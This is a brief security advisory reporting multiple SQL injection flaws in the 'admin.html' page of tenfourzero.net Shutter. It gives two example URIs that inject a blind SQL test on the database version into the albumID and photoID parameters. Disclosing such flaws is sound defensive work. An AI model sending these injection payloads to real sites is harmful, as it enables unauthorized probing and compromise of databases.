tenfourzero.net Shutter 'admin.html' Multiple SQL Injection Vulnerabilities

tenfourzero.net Shutter 'admin.html' Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URIs are available:

http://www.example.com/shutter/admin.html?albumID=2%20and%20substring%28@@version,1,1%29=5
http://www.example.com/shutter/admin.html?albumID=2&photoID=5%20and%20substring%28@@version,1,1%29=5